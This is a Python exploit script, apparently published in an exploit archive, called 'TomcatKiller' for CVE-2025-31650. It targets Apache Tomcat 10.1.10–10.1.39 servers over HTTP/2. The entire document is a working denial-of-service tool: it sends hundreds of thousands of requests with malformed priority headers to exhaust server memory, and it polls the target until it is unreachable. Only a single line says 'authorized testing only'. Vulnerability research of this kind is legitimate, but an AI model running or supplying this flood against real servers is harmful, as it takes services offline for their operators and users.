# Exploit Title: Apache Tomcat 10.1.39 - Denial of Service (DOS) # Author: Abdualhadi khalifa # CVE: CVE-2025-31650 import httpx import asyncio import random import urllib.parse import sys import socket from colorama import init, Fore, Style init() class TomcatKiller: def __init__(self): self.success_count = 0 self.error_count = 0 self.invalid_priorities = [ \\\"u=-1, q=2\\\", \\\"u=4294967295, q=-1\\\", \\\"u=-2147483648, q=1.5\\\", \\\"u=0, q=invalid\\\", \\\"u=1/0, q=NaN\\\", \\\"u=1, q=2, invalid=param\\\", \\\"\\\", \\\"u=1, q=1, u=2\\\", \\\"u=99999999999999999999, q=0\\\", \\\"u=-99999999999999999999, q=0\\\", \\\"u=, q=\\\", \\\"u=1, q=1, malformed\\\", \\\"u=1, q=, invalid\\\", \\\"u=-1, q=4294967295\\\", \\\"u=invalid, q=1\\\", \\\"u=1, q=1, extra=\\\", \\\"u=1, q=1; malformed\\\", \\\"u=1, q=1, =invalid\\\", \\\"u=0, q=0, stream=invalid\\\", \\\"u=1, q=1, priority=recursive\\\", \\\"u=1, q=1, %invalid%\\\", \\\"u=0, q=0, null=0\\\", ] async def validate_url(self, url): try: parsed_url = urllib.parse.urlparse(url) if not parsed_url.scheme or not parsed_url.hostname: raise ValueError(\\\"Invalid URL format. Use http:// or https://\\\") host = parsed_url.hostname port = parsed_url.port if parsed_url.port else (443 if parsed_url.scheme == \\\'https\\\' else 80) return host, port except Exception: print(f\\\"{Fore.RED}Error: Invalid URL. Use http:// or https:// format.{Style.RESET_ALL}\\\") sys.exit(1) async def check_http2_support(self, host, port): async with httpx.AsyncClient(http2=True, verify=False, timeout=5, limits=httpx.Limits(max_connections=1000)) as client: try: response = await client.get(f\\\"https://{host}:{port}/\\\", headers={\\\"user-agent\\\": \\\"TomcatKiller\\\"}) if response.http_version == \\\"HTTP/2\\\": print(f\\\"{Fore.GREEN}HTTP/2 supported! Proceeding ...{Style.RESET_ALL}\\\") return True else: print(f\\\"{Fore.YELLOW}Error: HTTP/2 not supported. This exploit requires HTTP/2.{Style.RESET_ALL}\\\") return False except Exception: print(f\\\"{Fore.RED}Error: Could not connect to {host}:{port}.{Style.RESET_ALL}\\\") return False async def send_invalid_priority_request(self, host, port, num_requests, task_id): async with httpx.AsyncClient(http2=True, verify=False, timeout=0.3, limits=httpx.Limits(max_connections=1000)) as client: url = f\\\"https://{host}:{port}/\\\" for i in range(num_requests): headers = { \\\"priority\\\": random.choice(self.invalid_priorities), \\\"user-agent\\\": f\\\"TomcatKiller-{task_id}-{random.randint(1, 1000000)}\\\", \\\"cache-control\\\": \\\"no-cache\\\", \\\"accept\\\": f\\\"*/*; q={random.random()}\\\", } try: await client.get(url, headers=headers) self.success_count += 1 except Exception: self.error_count += 1 async def monitor_server(self, host, port): while True: try: with socket.create_connection((host, port), timeout=2): print(f\\\"{Fore.YELLOW}Target {host}:{port} is reachable.{Style.RESET_ALL}\\\") except Exception: print(f\\\"{Fore.RED}Target {host}:{port} unreachable or crashed!{Style.RESET_ALL}\\\") break await asyncio.sleep(2) async def run_attack(self, host, port, num_tasks, requests_per_task): print(f\\\"{Fore.GREEN}Starting attack on {host}:{port}...{Style.RESET_ALL}\\\") print(f\\\"Tasks: {num_tasks}, Requests per task: {requests_per_task}\\\") print(f\\\"{Fore.YELLOW}Monitor memory manually via VisualVM or check catalina.out for OutOfMemoryError.{Style.RESET_ALL}\\\") monitor_task = asyncio.create_task(self.monitor_server(host, port)) tasks = [self.send_invalid_priority_request(host, port, requests_per_task, i) for i in range(num_tasks)] await asyncio.gather(*tasks) monitor_task.cancel() total_requests = num_tasks * requests_per_task success_rate = (self.success_count / total_requests * 100) if total_requests > 0 else 0 print(f\\\"\\\\n{Fore.MAGENTA}===== Attack Summary ====={Style.RESET_ALL}\\\") print(f\\\"Target: {host}:{port}\\\") print(f\\\"Total Requests: {total_requests}\\\") print(f\\\"Successful Requests: {self.success_count}\\\") print(f\\\"Failed Requests: {self.error_count}\\\") print(f\\\"Success Rate: {success_rate:.2f}%\\\") print(f\\\"{Fore.MAGENTA}========================={Style.RESET_ALL}\\\") async def main(): print(f\\\"{Fore.BLUE}===== TomcatKiller - CVE-2025-31650 ====={Style.RESET_ALL}\\\") print(f\\\"Developed by: @absholi7ly\\\") print(f\\\"Exploits memory leak in Apache Tomcat (10.1.10-10.1.39) via invalid HTTP/2 priority headers.\\\") print(f\\\"{Fore.YELLOW}Warning: For authorized testing only. Ensure HTTP/2 and vulnerable Tomcat version.{Style.RESET_ALL}\\\\n\\\") url = input(f\\\"{Fore.CYAN}Enter target URL (e.g., https://localhost:8443): {Style.RESET_ALL}\\\") num_tasks = int(input(f\\\"{Fore.CYAN}Enter number of tasks (default 300): {Style.RESET_ALL}\\\") or 300) requests_per_task = int(input(f\\\"{Fore.CYAN}Enter requests per task (default 100000): {Style.RESET_ALL}\\\") or 100000) tk = TomcatKiller() host, port = await tk.validate_url(url) if not await tk.check_http2_support(host, port): sys.exit(1) await tk.run_attack(host, port, num_tasks, requests_per_task) if __name__ == \\\"__main__\\\": try: asyncio.run(main()) print(f\\\"{Fore.GREEN}Attack completed!{Style.RESET_ALL}\\\") except KeyboardInterrupt: print(f\\\"{Fore.YELLOW}Attack interrupted by user.{Style.RESET_ALL}\\\") sys.exit(0) except Exception as e: print(f\\\"{Fore.RED}Unexpected error: {e}{Style.RESET_ALL}\\\") sys.exit(1)